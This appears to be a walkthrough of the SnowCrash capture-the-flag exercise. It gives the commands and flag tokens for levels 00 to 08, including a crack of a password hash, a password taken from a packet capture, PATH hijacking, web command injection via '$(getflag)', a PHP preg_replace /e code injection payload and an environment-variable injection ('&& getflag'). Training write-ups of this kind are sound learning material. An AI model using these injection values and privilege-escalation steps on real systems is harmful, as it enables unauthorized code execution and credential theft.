level 00 :
exemple previous find : (find '/home/user/flag00' grep -i -I "pass" {} /dev/null \;)
find / -user flag00 2>/dev/null;
cat /usr/sbin/john
cdiiddwpgswtgt
apply encrypt rot11 | decrypt rot15
nottoohardhere

Check flag.Here is your token : x24ti5gi3x0ol2eh4esiuxias
=========================================================
level 01 :
check /etc/passwd
"flag01:42hDRfypTqqnw:3001:3001::/home/flag/flag01:/bin/bash"

apt install john (host os)
john mypasswd.txt => abcdefg
Check flag.Here is your token : f2av5il02puano7naaf6adaaf
=========================================================
level 02 :
scp -P 4242 level02@192.168.1.147:~/level02.pcap .


wireshark : 
..%..%..&..... ..#..'..$..&..... ..#..'..$.. .....#.....'........... .38400,38400....#.SodaCan:0....'..DISPLAY.SodaCan:0......xterm.........."........!........"..".....b........b....	B.
..............................1.......!.."......"......!..........."........"..".............	..
.....................
Linux 2.6.38-8-generic-pae (::ffff:10.1.1.2) (pts/10)

..wwwbugs login: l.le.ev.ve.el.lX.X
..
Password: ft_wandr...NDRel.L0L
.
..
Login incorrect
wwwbugs login: 
"
follow tcp stream
filter 206bytes
ft_wandrNDRelL0L

Check flag.Here is your token : kooda2puivaav1idi4f57q8iq
=========================================================
level 03 :
scp -P 4242 level03@192.168.1.147:~/level03 .
do => file level03
result => level03: ELF 32-bit LSB executable
do => strings level03
result found => /usr/bin/env echo Exploit me
create file in tmp because : d-wx-wx-wx  4 root root   80 May 15 21:00 tmp
echo '/bin/getflag' > echo
chmod 777 echo
printenv
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
PATH=/tmp

Check flag.Here is your token : qi0maab88jeaj46qoumi7maus
=========================================================
level 04 :
check /etc/www/

test:
curl http://localhost:4747?ls => blank
curl http://localhost:4747?x=ls => ls
curl http://localhost:4747?x=$(ls) => level04.pl
curl http://192.168.1.147:4747/?x=$(getflag) => Check
curl: (6) Couldn't resolve host 'flag.Here'
curl: (6) Couldn't resolve host 'is'
curl: (6) Couldn't resolve host 'your'
curl: (6) Couldn't resolve host 'token'
curl: (6) Couldn't resolve host ''
curl: (6) Couldn't resolve host 'Nope'
curl: (6) Couldn't resolve host 'there'
curl: (6) Couldn't resolve host 'is'
curl: (6) Couldn't resolve host 'no'
curl: (6) Couldn't resolve host 'token'
curl: (6) Couldn't resolve host 'here'
curl: (6) Couldn't resolve host 'for'
curl: (6) Couldn't resolve host 'you'
curl: (6) Couldn't resolve host 'sorry.'
curl: (6) Couldn't resolve host 'Try'
curl: (6) Couldn't resolve host 'again'

curl http://localhost:4747\?x\=$\(getflag\) => Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
utils cmd : curl -G -d "x=<value>" http://localhost:4747/script.pl
in web browser (?x=$(getflag)) => 

Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
=========================================================
level 05 :
check in mail  level05 file => */2 * * * * su -c "sh /usr/sbin/openarenaserver" - flag05
put in crontab -e

level05@SnowCrash:/$ find / -user flag05 2>/dev/null;
/usr/sbin/openarenaserver
/rofs/usr/sbin/openarenaserver

level05@SnowCrash:/usr/sbin$ cat openarenaserver 
#!/bin/sh

for i in /opt/openarenaserver/* ; do
        (ulimit -t 5; bash -x "$i")
        rm -f "$i"
done

find a place where I can create file other than /opt/openarenaserver

"/bin/getflag > /tmp/flag05" in a file + chmod +x

Check flag.Here is your token : viuaaale9huek52boumoomioc
=========================================================
level 06 :
cat level06.php 
#!/usr/bin/php
<?php
function y($m) {
    $m = preg_replace("/\./", " x ", $m);
    $m = preg_replace("/@/", " y", $m);
    return $m;
    }
function x($y, $z) {
    $a = file_get_contents($y);
    $a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a);
    $a = preg_replace("/\[/", "(", $a);
    $a = preg_replace("/\]/", ")", $a);
    return $a;
    }
$r = x($argv[1], $argv[2]); print $r;
?>

# TODO
create a file to sent to level06 php executable in tmp
[x {${`getflag`}}]
./level06 /tmp/flag06

test :
sent [x {hello.world}] => {hello x world}

debug_info : 
- argv2 not use
- [x ..] to cal first function function x($y, $z)
- {${`getflag`}} use in function y($m) return with no change to file_get_contents

risk :
The /e modifier evaluates the replacement as PHP code, which can be a security risk if the input is not properly validated or sanitized.
$a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a);

If an attacker can control the input file or the second argument passed to the script ($argv[2]), they could potentially execute arbitrary PHP code within the y() function.
This can lead to unauthorized code execution and pose a security risk.
To mitigate this vulnerability, it is important to validate and sanitize user input before using it in such dynamic evaluation scenarios.
You should carefully review and validate any input before passing it to functions like preg_replace with the /e modifier or executing it as code.
It is generally recommended to use alternative approaches,
such as using preg_replace_callback with a custom callback function, to achieve the desired functionality without introducing potential code injection vulnerabilities.

PHP Notice:  Undefined variable: Check flag.Here is your token : wiok45aaoguiboiki2tuin6ub
=========================================================
level 07 :
ltrace ./level07
=> response 
__libc_start_main(0x8048514, 1, 0xbffff7e4, 0x80485b0, 0x8048620 <unfinished ...>
getegid()                                                                                                                                     = 2007
geteuid()                                                                                                                                     = 2007
setresgid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280)                                                                                           = 0
setresuid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280)                                                                                           = 0
getenv("LOGNAME")                                                                                                                             = "level07"
asprintf(0xbffff734, 0x8048688, 0xbfffff46, 0xb7e5ee55, 0xb7fed280)                                                                           = 18
system("/bin/echo level07 "level07
 <unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                                                                        = 0
+++ exited (status 0) +++
===

getenv("LOGNAME")                                                                                                                             = "level07"
export LOGNAME=ls 

level07@SnowCrash:~$ export LOGNAME="&& ls"
level07@SnowCrash:~$ ./level07

ls: cannot open directory .: Permission denied

level07@SnowCrash:~$ export LOGNAME="&& getflag"
level07@SnowCrash:~$ ./level07

Check flag.Here is your token : fiumuikeil55xe9cu4dood66h
=========================================================
level 08:

level08@SnowCrash:~$ cat token 
cat: token: Permission denied
level08@SnowCrash:~$ ./level08 
./level08 [file to read]
level08@SnowCrash:~$ ./level08 token 
You may not access 'token'
level08@SnowCrash:~$ chmod +x token 
chmod: changing permissions of `token': Operation not permitted
level08@SnowCrash:~$ nm 
.bash_logout  .bashrc       level08       .profile      token
level08@SnowCrash:~$ nm level08 
08049f28 d _DYNAMIC
08049ff4 d _GLOBAL_OFFSET_TABLE_
0804877c R _IO_stdin_used
         w _Jv_RegisterClasses
08049f18 d __CTOR_END__
08049f14 d __CTOR_LIST__
08049f20 D __DTOR_END__
08049f1c d __DTOR_LIST__
080488d0 r __FRAME_END__
08049f24 d __JCR_END__
08049f24 d __JCR_LIST__
0804a030 A __bss_start
0804a028 D __data_start
08048730 t __do_global_ctors_aux
080484d0 t __do_global_dtors_aux
0804a02c D __dso_handle
         w __gmon_start__
08048722 T __i686.get_pc_thunk.bx
08049f14 d __init_array_end
08049f14 d __init_array_start
08048720 T __libc_csu_fini
080486b0 T __libc_csu_init
         U __libc_start_main@@GLIBC_2.0
         U __stack_chk_fail@@GLIBC_2.4
0804a030 A _edata
0804a038 A _end
0804875c T _fini
08048778 R _fp_hw
080483b4 T _init
080484a0 T _start
0804a030 b completed.6159
0804a028 W data_start
0804a034 b dtor_idx.6161
         U err@@GLIBC_2.0
         U exit@@GLIBC_2.0
08048530 t frame_dummy
08048554 T main
         U open@@GLIBC_2.0
         U printf@@GLIBC_2.0
         U read@@GLIBC_2.0
         U strstr@@GLIBC_2.0
         U write@@GLIBC_2.0
level08@SnowCrash:~$ ltrace ./level08 token
__libc_start_main(0x8048554, 2, 0xbffff7d4, 0x80486b0, 0x8048720 <unfinished ...>
strstr("token", "token")                                                                                                                      = "token"
printf("You may not access '%s'\n", "token"You may not access 'token'
)                                                                                                  = 27
exit(1 <unfinished ...>
+++ exited (status 1) +++
test : 
- mv failed
- cp (with permissions option)
- scp
- ln -> correct
create link to access token value and change change name because of strstr
quif5eloekouj29ke0vouxean
Check flag.Here is your token : 25749xKZ8L7DkSCwJkT9dyv6f
=========================================================
level 09 :

=========================================================
level 12 :
check www